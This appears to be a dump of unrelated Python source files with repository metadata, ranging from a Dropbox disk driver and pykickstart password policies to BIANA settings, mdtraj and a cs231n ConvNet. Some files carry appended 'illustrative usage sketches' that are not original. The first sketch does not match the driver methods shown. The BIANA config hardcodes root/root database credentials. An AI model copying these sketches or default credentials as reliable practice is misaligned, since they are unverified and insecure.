# a bit sloppy, but shouldn't lead to a significant attack
self.cache_size = cache_size
try:
f,meta = self.client.get_file_and_metadata("/config")
hack = StringIO(f.read())
hack.seek(0)
size = int(hack.readline())
sector_size = int(hack.readline())
super(DropboxDiskDriver,self).__init__(size,sector_size,cache_size)
f.close()
except rest.ErrorResponse:
print "config doesnt exist on server"
super(DropboxDiskDriver,self).__init__(0,1,cache_size)
pass
def get_sector(self,sector):
f, metadata = self.client.get_file_and_metadata(self.get_sector_name(sector))
data = f.read(self.sector_size)
f.close()
return data
def write_sector(self,sector,data):
f = StringIO(data)
self.client.put_file(self.get_sector_name(sector), f)
def get_sector_name(self,sector):
sector_name = '/'+str(sector)
return sector_name
def authenticate(self):
ACCESS_TYPE='dropbox'
sess = session.DropboxSession(APP_KEY, APP_SECRET, ACCESS_TYPE)
request_token = sess.obtain_request_token()
url = sess.build_authorize_url(request_token)
print "url:", url
print "Please visit this website and press the 'Allow' button, then hit 'Enter' here."
raw_input()
access_token = sess.obtain_access_token(request_token)
self.client = client.DropboxClient(sess)
def create_disk(self,size,sector_size,rand_source='/dev/urandom'):
config = StringIO()
s = "%d\n%d" %(size,sector_size)
config.write(s)
config.seek(0)
self.client.put_file("/config", config)
for i in range(0,int(size/sector_size)):
s = get_random_sector(sector_size,rand_source)
self.write_sector(i,s)
self.size = size
self.sector_size = sector_size
super(DropboxDiskDriver,self).__init__(size,sector_size,self.cache_size)
def delete_disk(self):
self.client.file_delete("/config")
for i in range(0,int(self.size/self.sector_size)):
self.client.file_delete(self.get_sector_name(i))
self.size = 0
self.sector_size = 0
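# ---------------------------------------------------------------------
# Illustrative usage sketch (added for exposition; not part of the
# original module). Exercises the file-backed driver defined above with
# a hypothetical path "/tmp/demo.disk": create a small disk, overwrite
# one sector, and read it back.
if __name__ == "__main__":
    FileDiskDriver.create_disk("/tmp/demo.disk", 4096, 512)
    disk = FileDiskDriver("/tmp/demo.disk")
    payload = "A" * disk.sector_size
    disk.write(3, payload)            # fill sector 3 with a known pattern
    assert disk.read(3) == payload    # and read it straight back
    disk.flush()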
|
uzyszkodnik/blockcrypt
|
src/DiskDrivers.py
|
Python
|
bsd-3-clause
| 6,850
|
[
"VisIt"
] |
bef6eaff7b222425db031945faf8ee9207df124ccf63a0bac61d84398f70ae59
|
#
# Brian C. Lane <bcl@redhat.com>
#
# Copyright 2015 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Any Red Hat
# trademarks that are incorporated in the source code or documentation are not
# subject to the GNU General Public License and may only be used or replicated
# with the express permission of Red Hat, Inc.
#
from pykickstart.base import BaseData, KickstartCommand
from pykickstart.errors import KickstartParseError, formatErrorMsg
from pykickstart.options import KSOptionParser
import warnings
from pyanaconda.i18n import _
class F22_PwPolicyData(BaseData):
""" Kickstart Data object to hold information about pwpolicy. """
removedKeywords = BaseData.removedKeywords
removedAttrs = BaseData.removedAttrs
def __init__(self, *args, **kwargs):
BaseData.__init__(self, *args, **kwargs)
self.name = kwargs.get("name", "")
self.minlen = kwargs.get("minlen", 8)
self.minquality = kwargs.get("minquality", 50)
self.strict = kwargs.get("strict", True)
self.changesok = kwargs.get("changesok", False)
self.emptyok = kwargs.get("emptyok", True)
def __eq__(self, y):
if not y:
return False
return self.name == y.name
def __ne__(self, y):
return not self == y
def __str__(self):
retval = BaseData.__str__(self)
if self.name != "":
retval += "pwpolicy"
retval += self._getArgsAsStr() + "\n"
return retval
def _getArgsAsStr(self):
retval = ""
retval += " %s" % self.name
retval += " --minlen=%d" % self.minlen
retval += " --minquality=%d" % self.minquality
if self.strict:
retval += " --strict"
else:
retval += " --notstrict"
if self.changesok:
retval += " --changesok"
else:
retval += " --nochanges"
if self.emptyok:
retval += " --emptyok"
else:
retval += " --notempty"
return retval
class F22_PwPolicy(KickstartCommand):
""" Kickstart command implementing password policy. """
removedKeywords = KickstartCommand.removedKeywords
removedAttrs = KickstartCommand.removedAttrs
def __init__(self, writePriority=0, *args, **kwargs):
KickstartCommand.__init__(self, writePriority, *args, **kwargs)
self.op = self._getParser()
self.policyList = kwargs.get("policyList", [])
def __str__(self):
retval = ""
for policy in self.policyList:
retval += policy.__str__()
return retval
def _getParser(self):
op = KSOptionParser()
op.add_option("--minlen", type="int")
op.add_option("--minquality", type="int")
op.add_option("--strict", action="store_true")
op.add_option("--notstrict", dest="strict", action="store_false")
op.add_option("--changesok", action="store_true")
op.add_option("--nochanges", dest="changesok", action="store_false")
op.add_option("--emptyok", action="store_true")
op.add_option("--notempty", dest="emptyok", action="store_false")
return op
def parse(self, args):
(opts, extra) = self.op.parse_args(args=args, lineno=self.lineno)
if len(extra) != 1:
raise KickstartParseError(formatErrorMsg(self.lineno, msg=_("policy name required for %s") % "pwpolicy"))
pd = self.handler.PwPolicyData()
self._setToObj(self.op, opts, pd)
pd.lineno = self.lineno
pd.name = extra[0]
# Check for duplicates in the data list.
if pd in self.dataList():
warnings.warn(_("A %(command)s with the name %(policyName)s has already been defined.") % {"command": "pwpolicy", "policyName": pd.name})
return pd
def dataList(self):
return self.policyList
def get_policy(self, name):
""" Get the policy by name
:param str name: Name of the policy to return.
"""
policy = [p for p in self.policyList if p.name == name]
if policy:
return policy[0]
else:
return None
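# ---------------------------------------------------------------------
# Illustrative usage sketch (added for exposition; not part of the
# original module): build a policy data object directly and render it
# back to kickstart syntax via __str__ / _getArgsAsStr.
if __name__ == "__main__":
    pd = F22_PwPolicyData(name="user", minlen=12, minquality=60, strict=False)
    # Expected to render roughly:
    #   pwpolicy user --minlen=12 --minquality=60 --notstrict --nochanges --emptyok
    print(str(pd))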
|
AdamWill/anaconda
|
pyanaconda/pwpolicy.py
|
Python
|
gpl-2.0
| 4,777
|
[
"Brian"
] |
96f0e629e1866e3afe5c66e7c96d9821a49586943c313dc7fea01bc0632ba017
|
"""
BIANA: Biologic Interactions and Network Analysis
Copyright (C) 2009 Javier Garcia-Garcia, Emre Guney, Baldo Oliva
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# This file contains specific default user parameters used in biana
# DATABASE CONNECTION DEFAULT PARAMETERS
DBNAME = 'biana'
DBUSER = 'root'
DBPASS = 'root'
DBHOST = 'localhost'
DBPORT = None
DBSOCKET = '/home/jgarcia/local/mysql/var/mysql.sock'
MAX_ALIAS_SIZE = 255
EXTERNAL_ENTITY_TYPES = ["protein",
"DNA",
"RNA",
"mRNA",
"tRNA",
"rRNA",
"CDS",
"gene",
"sRNA",
"snRNA",
"snoRNA",
"structure",
"pattern",
"compound",
"drug",
"glycan",
"enzyme",
"relation",
"ontology",
"SCOPElement",
"taxonomyElement",
"PsiMiOboOntologyElement",
"GOElement"
]
EXTERNAL_ENTITY_RELATION_TYPES = [ "interaction",
"no_interaction",
"reaction",
"functional_association",
"cluster",
"homology",
"pathway",
"alignment",
"complex",
"regulation",
"cooperation",
"forward_reaction",
"backward_reaction"
]
# EXTERNAL ENTITY ATTRIBUTE TYPES
EXTERNAL_ENTITY_IDENTIFIER_ATTRIBUTES = [ ("CHEBI", "integer unsigned"),
("COG", "varchar(10)"),
("CYGD", "varchar(15)"), # normally 7 (YDR172w) but sometimes 9 (YLR312w-a) (in mips there are some errors... because of that, we increase it to 15
("DIP", "varchar(6)"), # DIP:216N (~17000 entries)
("EC", "varchar(30)"),
("Encode", "varchar(14)"),
("Ensembl", "varchar(40)"),
("FlyBase", "varchar(13)"),
("GDB", "integer(3) unsigned"),
("GeneID", "integer(4) unsigned"),
("GeneSymbol", "varchar(255)"),
("GenomeReviews", "varchar(15)"),
("GI", "integer(4) unsigned"),
("GO", "integer(3) unsigned"),
("HGNC", "integer(2) unsigned"),
("Homologene", "integer(3) unsigned"),
("HPRD", "integer(3) unsigned"),
("Huge", "smallint unsigned"),
("IMGT", "varchar(10)"),
("IntAct", "integer(3) unsigned"),
("IntEnz", "varchar(10)"),
("InterPro", "varchar(12)"),
#("IPI", "varchar(20)"), # Moved to versionable attributes
("KeggCode", "char(6)"),
("KeggGene", "varchar(155)"),
("Method_id", "integer(2) unsigned"), #psi_mi obo mi code
("MGI", "integer(3) unsigned"),
("MIM", "integer(3) unsigned"),
("MINT", "integer(3) unsigned"),
("MIPS", "integer(2) unsigned"),
("OrderedLocusName", "varchar(255)"),
("ORFName", "varchar(255)"), # Actually at most 7: YAL213W: Yeast (Y) 1st (A) chromosome's left (L) at 213th (213) position on Watson (W) strand
("PFAM", "varchar(255)"),
("PIR", "varchar(8)"),
("PRINTS", "varchar(15)"),
("PRODOM", "varchar(15)"),
("Prosite", "varchar(255)"),
("psimi_name", "varchar(255)"),
("PubChemCompound", "integer(3) unsigned"),
("Ratmap", "integer(3) unsigned"),
("Reactome", "integer unsigned"),
("RGD", "integer unsigned"),
("SCOP", "integer(3) unsigned"),
("SGD", "varchar(15)"),
("STRING", "varchar(25)"), # gives ordered locus names, so called ensembl codes and many more
("Tair", "varchar(100)"),
("TaxID", "integer(3) unsigned"),
("Unigene", "varchar(10)"),
("UniParc", "binary(10)"),
("UniprotEntry", "varchar(15)"),
("WormBaseGeneID", "integer(3) unsigned"),
("WormBaseSequenceName", "varchar(255)"),
("YPD", "varchar(15)"),
("iRefIndex_ROGID", "varchar(255)"),
("iRefIndex_RIGID", "varchar(255)"),
]
EXTERNAL_ENTITY_GENERAL_ATTRIBUTES = []
PROMISCUOUS_EXTERNAL_ENTITY_TYPES_DICT = [ ("SCOPElement", "PDB") ]
VALID_IDENTIFIER_REFERENCE_TYPES = ["unique", "previous", "alias", "cross-reference", "synonym","short-name", "exact_synonym", "related_synonym", "broad_synonym", "narrow_synonym"]
CROSSABLE_ATTRIBUTES = set(["sequence","taxid","ipi","uniprotentry","uniprotaccession","genesymbol","geneid","refseq","ec"])
EXTERNAL_ENTITY_VERSIONABLE_IDENTIFIER_ATTRIBUTE_TYPES = [("AccessionNumber", "varchar(15)"),
("RefSeq", "varchar(15)"),
("TIGR", "varchar(255)"),
("UniprotAccession", "varchar(9)"),
("IPI", "varchar(20)"),
]
EXTERNAL_ENTITY_DESCRIPTIVE_SEARCHABLE_ATTRIBUTE_TYPES = [("Disease", "text"),
("Function", "text"),
("Keyword", "varchar(255)"),
("Description", "text"),
("SubcellularLocation", "text"),
("Name", "varchar(255)")
]
EXTERNAL_ENTITY_DESCRIPTIVE_ATTRIBUTE_TYPES = [("Pubmed", "integer(3) unsigned"),
("Formula", "varchar(255)")
]
EXTERNAL_ENTITY_NUMERIC_ATTRIBUTE_TYPES = [("Pvalue", "double"),
("Score", "double"),
("iRefIndex_lpr", "integer unsigned"),
("iRefIndex_hpr", "integer unsigned"),
("iRefIndex_np", "integer unsigned"),
("STRINGScore", "int(2)"),
("STRINGScore_neighborhood","int(2)"),
("STRINGScore_fusion","int(2)"),
("STRINGScore_cooccurence","int(2)"),
("STRINGScore_coexpression","int(2)"),
("STRINGScore_experimental","int(2)"),
("STRINGScore_db", "int(2)"),
("STRINGScore_textmining","int(2)")]
EXTERNAL_ENTITY_SPECIAL_ATTRIBUTE_TYPES = { "PDB": {"fields": [ ("value","char(4)"),
("chain","varchar(4)",True),
("pdb_range","varchar(255)",True) ],
"indices": ("value","chain","pdb_range")},
"ProteinSequence": { "fields": [ ("value","binary(16)"),
("sequenceType","ENUM(\"peptide\")",False) ],
"indices": ("value",) },
"NucleotideSequence": { "fields": [ ("value","binary(16)"),
("sequenceType","ENUM(\"dna\",\"rna\")",False)],
"indices": ("value",)},
"SequenceMap": { "fields": [ ("value","binary(16)"),
("seq_range","varchar(255)",False) ],
"indices": ()},
"Pattern": { "fields": [ ("value","varchar(255)"),
("patternExpression","varchar(255)",False)],
"indices": ("value",)}, # Stores a regex
#"STRINGScore": { "fields": [ ("value","int(2)"), # moved to regular attributes as seperate score attributes
# ("neighborhood","int(2)",True),
# ("fusion","int(2)",True),
# ("cooccurence","int(2)",True),
# ("coexpression","int(2)",True),
# ("experimental","int(2)",True),
# ("db", "int(2)", True),
# ("textmining","int(2)",True)],
# "indices": () }
}
# EXTERNAL ENTITY RELATION PARTICIPANT ATTRIBUTE TYPES
EXTERNAL_ENTITY_RELATION_PARTICIPANT_ATTRIBUTE_TYPES = [ ("cardinality", "smallint unsigned"),
("detection_method", "smallint unsigned"),
("GO", "integer(3) unsigned"),
("KeggCode", "varchar(6)"),
("role", "ENUM(\"batch\",\"product\",\"substrate\",\"catalyst\",\"prey\",\"bait\",\"neutral\",\"acceptor\",\"donor\",\"self\",\"ancillary\",\"enzyme\",\"enzyme target\",\"inhibitor\",\"cofactor\",\"stimulator\",\"activates\",\"inhibits\",\"allosteric_inhibition\",\"competitive_inhibition\",\"irreversible_inhibition\",\"non_competitive_inhibition\",\"uncompetitive_inhibition\",\"allosteric_activation\",\"nonallosteric_activation\",\"transcription_factor\",\"regulated_DNA\",\"onward_effect\",\"reverse_effect\")")
]
# EXTERNAL SOFTWARE EXECUTABLES
CLUSTALW_EXEC = '/soft/bio/sequence/clustalw' # '/usr/local/bin/clustalw'
FORMATDB_EXEC = '/soft/bio/sequence/blast-2.2.17/bin/formatdb'
BLASTALL_EXEC = '/soft/bio/sequence/blast-2.2.17/bin/blastall'
BL2SEQ_EXEC = '/soft/bio/sequence/blast-2.2.17/bin/bl2seq'
TCOFFEE_EXEC = '/soft/bio/sequence/t-coffee-6.92' #'/Users/javigx2/phD/external_software/tcoffee/T-COFFEE_distribution_Version_7.04/bin/macosx/t_coffee'
#DSSP_EXEC = '/Users/javigx2/phD/external_software/dssp/dssp/dsspcmbi'
DSSP_EXEC = '/soft/bio/structure/dssp/dsspcmbi'
#CD_HIT_PATH = '/home/emre/lib/cd-hit/'
CD_HIT_PATH = '/soft/bio/sequence/cd-hit/'
#CD_HIT_PATH = '/home/jgarcia/programs/CD-HIT/cd-hit/'
# DEFAULT TEMPORAL DATA PATHS
TEMPORAL_PATH = None
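# ---------------------------------------------------------------------
# Illustrative sketch (added for exposition; not part of the original
# configuration). The (name, SQL type) pairs above are consumed elsewhere
# in BIANA to build attribute tables; a hypothetical rendering of that
# step (the table naming here is made up) could look like this.
if __name__ == "__main__":
    for attr_name, sql_type in EXTERNAL_ENTITY_IDENTIFIER_ATTRIBUTES[:3]:
        print("CREATE TABLE externalEntity%s "
              "(externalEntityID integer unsigned, value %s)"
              % (attr_name, sql_type))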
|
emreg00/biana
|
biana/biana_globals.py
|
Python
|
gpl-3.0
| 14,395
|
[
"BLAST"
] |
3e109d7210010add83336b8883503ee57434c2bce2fa5666c5febf1d898f195e
|
import os.path
import paste.fileapp
from pylons.middleware import error_document_template, media_path
from dirac.lib.base import *
class ErrorController(BaseController):
"""Generates error documents as and when they are required.
The ErrorDocuments middleware forwards to ErrorController when error
related status codes are returned from the application.
This behaviour can be altered by changing the parameters to the
ErrorDocuments middleware in your config/middleware.py file.
"""
def document(self):
"""Render the error document"""
page = error_document_template % \
dict(prefix=request.environ.get('SCRIPT_NAME', ''),
code=request.params.get('code', ''),
message=request.params.get('message', ''))
return page
def img(self, id):
"""Serve Pylons' stock images"""
return self._serve_file(os.path.join(media_path, 'img', id))
def style(self, id):
"""Serve Pylons' stock stylesheets"""
return self._serve_file(os.path.join(media_path, 'style', id))
def _serve_file(self, path):
"""Call Paste's FileApp (a WSGI application) to serve the file
at the specified path
"""
fapp = paste.fileapp.FileApp(path)
return fapp(request.environ, self.start_response)
|
DIRACGrid/DIRACWeb
|
dirac/controllers/error.py
|
Python
|
gpl-3.0
| 1,344
|
[
"DIRAC"
] |
f44a175bdb0b751f5c3dad45bd2a2e72ff777e633c06b8db51acb1ffcdf7d1f5
|
import pandas as pd
import pickle
from rdkit import Chem
from rdkit.Chem import AllChem
import os.path as osp
import mastic.selection as masticsel
import mastic.molecule as masticmol
import mastic.system as masticsys
import mastic.interactions as masticinx
from mastic.interactions.hydrogen_bond import HydrogenBondType
from mastic.interfaces.rdkit import RDKitMoleculeWrapper
import mastic.config.interactions as masticinxconfig
import mastic.tests.data as masticdata
# without Hs straight from pdb
BEN_rdkit = Chem.MolFromPDBBlock(masticdata.BEN_3ptb, removeHs=False, sanitize=True)
trypsin_rdkit = Chem.MolFromPDBBlock(masticdata.trypsin_3ptb, removeHs=False, sanitize=True)
# with hydrogens added files
BEN_Hs_rdkit = Chem.MolFromPDBBlock(masticdata.BEN_Hs_3ptb, removeHs=False, sanitize=True)
trypsin_Hs_rdkit = Chem.MolFromPDBBlock(masticdata.trypsin_Hs_3ptb, removeHs=False, sanitize=True)
BEN_rdkit_wrapper = RDKitMoleculeWrapper(BEN_rdkit, mol_name="BEN")
trypsin_rdkit_wrapper = RDKitMoleculeWrapper(trypsin_rdkit, mol_name="Trypsin")
BEN_coords = BEN_rdkit_wrapper.get_conformer_coords(0)
trypsin_coords = trypsin_rdkit_wrapper.get_conformer_coords(0)
member_coords = [BEN_coords, trypsin_coords]
BEN_Molecule = masticdata.BEN_Molecule
Trypsin_Molecule = masticdata.Trypsin_Molecule
BEN_mol = BEN_Molecule.to_molecule(BEN_coords)
trypsin_mol = Trypsin_Molecule.to_molecule(trypsin_coords)
member_types = [BEN_Molecule, Trypsin_Molecule]
system_attrs = {'name' : 'trypsin-benzamidine-complex'}
Trypsin_Benzamidine_System = masticsys.SystemType("Trypsin_Benzamidine_System",
member_types=member_types,
**system_attrs)
print("making an AssociationType of the receptor and ligand in the Trypsin_Benzamidine_System")
rec_lig_attrs = {'name' : 'trypsin-benzamidine-complex'}
# rec_lig_attrs['ligand_type'] = ben_type
# rec_lig_attrs['receptor_type'] = trypsin_type
selection_map = {0 : None, 1 : None}
selection_types = [None, None]
Trypsin_Benzamidine_Association = \
masticsys.AssociationType("Trypsin_Benzamidine_Association",
system_type=Trypsin_Benzamidine_System,
selection_map=selection_map,
selection_types=selection_types,
**rec_lig_attrs)
# add it to the SystemType
Trypsin_Benzamidine_System.add_association_type(Trypsin_Benzamidine_Association)
# now when we make the system the selections are put into an
# Association that can be profiled
trypsys = Trypsin_Benzamidine_System.to_system(member_coords)
# from mastic.molecule import Molecules
print("testing Hbond interaction between molecules in the receptor ligand association")
tryp_ben_assoc = trypsys.associations[0]
intermember_key_pairs, intermember_interactions = \
tryp_ben_assoc.profile_interactions([HydrogenBondType])
intramember_key_pairs, intramember_interactions = \
tryp_ben_assoc.profile_interactions([HydrogenBondType],
intramember_interactions=True)
intermember_inx_class_df = pd.DataFrame([inx.interaction_class.record for
inx in intermember_interactions[HydrogenBondType]])
intramember_inx_class_df = pd.DataFrame([inx.interaction_class.record for
inx in intramember_interactions[HydrogenBondType]])
intermember_inx_df = pd.DataFrame([inx.record for inx in
intermember_interactions[HydrogenBondType]])
intramember_inx_df = pd.DataFrame([inx.record for inx in
intramember_interactions[HydrogenBondType]])
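# ---------------------------------------------------------------------
# Illustrative follow-up (added for exposition; not part of the original
# script): a quick summary of the interaction records collected above.
# The DataFrame columns are whatever each interaction's `record` carries.
print("inter-member hydrogen bonds: %d"
      % len(intermember_interactions[HydrogenBondType]))
print("intra-member hydrogen bonds: %d"
      % len(intramember_interactions[HydrogenBondType]))
print(intermember_inx_df.head())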
|
salotz/mast
|
prototypes/interactions_example.py
|
Python
|
mit
| 3,748
|
[
"RDKit"
] |
9b09dc30a16c55f50f3916667f23fb6af7b4c38b1e0aaa5d65a173cc4f8d7213
|
##############################################################################
# MDTraj: A Python Library for Loading, Saving, and Manipulating
# Molecular Dynamics Trajectories.
# Copyright 2012-2013 Stanford University and the Authors
#
# Authors: Robert McGibbon
# Contributors:
#
# MDTraj is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with MDTraj. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
"""The mdtraj package contains tools for loading and saving molecular dynamics
trajectories in a variety of formats, including Gromacs XTC & TRR, CHARMM/NAMD
DCD, AMBER BINPOS, PDB, and HDF5.
"""
from mdtraj.formats.registry import _FormatRegistry
from mdtraj.formats.xtc import load_xtc
from mdtraj.formats.trr import load_trr
from mdtraj.formats.hdf5 import load_hdf5
from mdtraj.formats.lh5 import load_lh5
from mdtraj.formats.netcdf import load_netcdf
from mdtraj.formats.mdcrd import load_mdcrd
from mdtraj.formats.dcd import load_dcd
from mdtraj.formats.binpos import load_binpos
from mdtraj.formats.pdb import load_pdb
from mdtraj.formats.arc import load_arc
from mdtraj.formats.openmmxml import load_xml
from mdtraj.formats.prmtop import load_prmtop
from mdtraj.formats.psf import load_psf
from mdtraj.formats.mol2 import load_mol2
from mdtraj.formats.amberrst import load_restrt, load_ncrestrt
from mdtraj.formats.lammpstrj import load_lammpstrj
from mdtraj.formats.dtr import load_dtr
from mdtraj.formats.xyzfile import load_xyz
from mdtraj.core import element
from mdtraj._rmsd import rmsd
from mdtraj._lprmsd import lprmsd
from mdtraj.core.topology import Topology
from mdtraj.geometry import *
from mdtraj.core.trajectory import *
from mdtraj.nmr import *
import mdtraj.reporters
def test(label='full', verbose=2):
"""Run tests for mdtraj using nose.
Parameters
----------
label : {'fast', 'full'}
Identifies the tests to run. The fast tests take about 10 seconds,
and the full test suite takes about two minutes (as of this writing).
verbose : int, optional
Verbosity value for test outputs, in the range 1-10. Default is 2.
"""
import mdtraj
from mdtraj.testing.nosetester import MDTrajTester
tester = MDTrajTester(mdtraj)
return tester.test(label=label, verbose=verbose, extra_argv=('--exe',))
# prevent nose from discovering this function; otherwise running it would
# send the test suite into an infinite loop
test.__test__ = False
def capi():
import os
import sys
module_path = sys.modules['mdtraj'].__path__[0]
return {
'lib_dir': os.path.join(module_path, 'core', 'lib'),
'include_dir': os.path.join(module_path, 'core', 'lib'),
}
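# ---------------------------------------------------------------------
# Illustrative usage sketch (added for exposition; not part of the
# original package __init__). Assumes hypothetical input files
# "traj.xtc" and "top.pdb"; shows the load-then-analyze flow the imports
# above enable, using only names defined in this module.
if __name__ == "__main__":
    traj = load("traj.xtc", top="top.pdb")   # any supported format works
    print(traj)                              # e.g. <mdtraj.Trajectory ...>
    rmsds = rmsd(traj, traj, frame=0)        # RMSD of every frame to frame 0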
|
hainm/mdtraj
|
mdtraj/__init__.py
|
Python
|
lgpl-2.1
| 3,268
|
[
"Amber",
"CHARMM",
"Gromacs",
"MDTraj",
"NAMD",
"NetCDF"
] |
a2894037e71846b4af6d0237703c82c3fea032f56e2e3fa5624fe67acbd2d059
|
import numpy as np
from cs231n.layers import *
from cs231n.fast_layers import *
from cs231n.layer_utils import *
def two_layer_convnet(X, model, y=None, reg=0.0, dropout=1.0):
"""
Compute the loss and gradient for a simple two-layer ConvNet. The architecture
is conv-relu-pool-affine-softmax, where the conv layer uses stride-1 "same"
convolutions to preserve the input size; the pool layer uses non-overlapping
2x2 pooling regions. We use L2 regularization on both the convolutional layer
weights and the affine layer weights.
Inputs:
- X: Input data, of shape (N, C, H, W)
- model: Dictionary mapping parameter names to parameters. A two-layer Convnet
expects the model to have the following parameters:
- W1, b1: Weights and biases for the convolutional layer
- W2, b2: Weights and biases for the affine layer
- y: Vector of labels of shape (N,). y[i] gives the label for the point X[i].
- reg: Regularization strength.
Returns:
If y is None, then returns:
- scores: Matrix of scores, where scores[i, c] is the classification score for
the ith input and class c.
If y is not None, then returns a tuple of:
- loss: Scalar value giving the loss.
- grads: Dictionary with the same keys as model, mapping parameter names to
their gradients.
"""
# Unpack weights
W1, b1, W2, b2 = model['W1'], model['b1'], model['W2'], model['b2']
N, C, H, W = X.shape
# We assume that the convolution is "same", so that the data has the same
# height and width after performing the convolution. We can then use the
# size of the filter to figure out the padding.
conv_filter_height, conv_filter_width = W1.shape[2:]
assert conv_filter_height == conv_filter_width, 'Conv filter must be square'
assert conv_filter_height % 2 == 1, 'Conv filter height must be odd'
assert conv_filter_width % 2 == 1, 'Conv filter width must be odd'
conv_param = {'stride': 1, 'pad': (conv_filter_height - 1) / 2}
pool_param = {'pool_height': 2, 'pool_width': 2, 'stride': 2}
dropout_param = {'p': dropout}
dropout_param['mode'] = 'test' if y is None else 'train'
# Compute the forward pass
a1, cache1 = conv_relu_pool_forward(X, W1, b1, conv_param, pool_param)
d1, cache2 = dropout_forward(a1, dropout_param)
scores, cache3 = affine_forward(d1, W2, b2)
if y is None:
return scores
# Compute the backward pass
data_loss, dscores = softmax_loss(scores, y)
# Compute the gradients using a backward pass
dd1, dW2, db2 = affine_backward(dscores, cache3)
da1 = dropout_backward(dd1, cache2)
dX, dW1, db1 = conv_relu_pool_backward(da1, cache1)
# Add regularization
dW1 += reg * W1
dW2 += reg * W2
reg_loss = 0.5 * reg * sum(np.sum(W * W) for W in [W1, W2])
loss = data_loss + reg_loss
grads = {'W1': dW1, 'b1': db1, 'W2': dW2, 'b2': db2}
return loss, grads
def init_two_layer_convnet(weight_scale=1e-3, bias_scale=0, input_shape=(3, 32, 32),
num_classes=10, num_filters=32, filter_size=5):
"""
Initialize the weights for a two-layer ConvNet.
Inputs:
- weight_scale: Scale at which weights are initialized. Default 1e-3.
- bias_scale: Scale at which biases are initialized. Default is 0.
- input_shape: Tuple giving the input shape to the network; default is
(3, 32, 32) for CIFAR-10.
- num_classes: The number of classes for this network. Default is 10
(for CIFAR-10)
- num_filters: The number of filters to use in the convolutional layer.
- filter_size: The width and height for convolutional filters. We assume that
all convolutions are "same", so we pick padding to ensure that data has the
same height and width after convolution. This means that the filter size
must be odd.
Returns:
A dictionary mapping parameter names to numpy arrays containing:
- W1, b1: Weights and biases for the convolutional layer
- W2, b2: Weights and biases for the fully-connected layer.
"""
C, H, W = input_shape
assert filter_size % 2 == 1, 'Filter size must be odd; got %d' % filter_size
model = {}
model['W1'] = weight_scale * np.random.randn(num_filters, C, filter_size, filter_size)
model['b1'] = bias_scale * np.random.randn(num_filters)
model['W2'] = weight_scale * np.random.randn(num_filters * H * W / 4, num_classes)
model['b2'] = bias_scale * np.random.randn(num_classes)
return model
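# ---------------------------------------------------------------------
# Illustrative sketch (added for exposition; not part of the original
# assignment code): initialize the two-layer ConvNet above on a tiny
# random batch and sanity-check the loss and gradient shapes.
if __name__ == "__main__":
    X_tiny = np.random.randn(4, 3, 32, 32)
    y_tiny = np.random.randint(10, size=4)
    demo_model = init_two_layer_convnet(num_filters=8, filter_size=3)
    demo_loss, demo_grads = two_layer_convnet(X_tiny, demo_model, y_tiny, reg=1e-3)
    assert np.isfinite(demo_loss)
    assert demo_grads['W1'].shape == demo_model['W1'].shape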
def init_three_layer_convnet(input_shape=(3, 32, 32), num_classes=10,
filter_size=5, num_filters=(32, 128),
weight_scale=1e-2, bias_scale=0, dtype=np.float32):
"""
Initialize a three layer ConvNet with the following architecture:
conv - relu - pool - affine - relu - dropout - affine - softmax
The convolutional layer uses stride 1 and has padding to perform "same"
convolution, and the pooling layer is 2x2 stride 2.
Inputs:
- input_shape: Tuple (C, H, W) giving the shape of each training sample.
Default is (3, 32, 32) for CIFAR-10.
- num_classes: Number of classes over which classification will be performed.
Default is 10 for CIFAR-10.
- filter_size: The height and width of filters in the convolutional layer.
- num_filters: Tuple (F, H) where F is the number of filters to use in the
convolutional layer and H is the number of neurons to use in the hidden
affine layer.
- weight_scale: Weights are initialized from a gaussian distribution with
standard deviation equal to weight_scale.
- bias_scale: Biases are initialized from a gaussian distribution with
standard deviation equal to bias_scale.
- dtype: Numpy datatype used to store parameters. Default is float32 for
speed.
"""
C, H, W = input_shape
F1, FC = num_filters
model = {}
model['W1'] = np.random.randn(F1, C, filter_size, filter_size)
model['b1'] = np.random.randn(F1)
model['W2'] = np.random.randn(H * W * F1 / 4, FC)
model['b2'] = np.random.randn(FC)
model['W3'] = np.random.randn(FC, num_classes)
model['b3'] = np.random.randn(num_classes)
for i in [1, 2, 3]:
model['W%d' % i] *= weight_scale
model['b%d' % i] *= bias_scale
for k in model:
model[k] = model[k].astype(dtype, copy=False)
return model
def three_layer_convnet(X, model, y=None, reg=0.0, dropout=None):
"""
Compute the loss and gradient for a simple three layer ConvNet that uses
the following architecture:
conv - relu - pool - affine - relu - dropout - affine - softmax
The convolution layer uses stride 1 and sets the padding to achieve "same"
convolutions, and the pooling layer is 2x2 stride 2. We use L2 regularization
on all weights, and no regularization on the biases.
Inputs:
- X: (N, C, H, W) array of input data
- model: Dictionary mapping parameter names to values; it should contain
the following parameters:
- W1, b1: Weights and biases for convolutional layer
- W2, b2, W3, b3: Weights and biases for affine layers
- y: Integer array of shape (N,) giving the labels for the training samples
in X. This is optional; if it is not given then return classification
scores; if it is given then instead return loss and gradients.
- reg: The regularization strength.
- dropout: The dropout parameter. If this is None then we skip the dropout
layer; this allows this function to work even before the dropout layer
has been implemented.
"""
W1, b1 = model['W1'], model['b1']
W2, b2 = model['W2'], model['b2']
W3, b3 = model['W3'], model['b3']
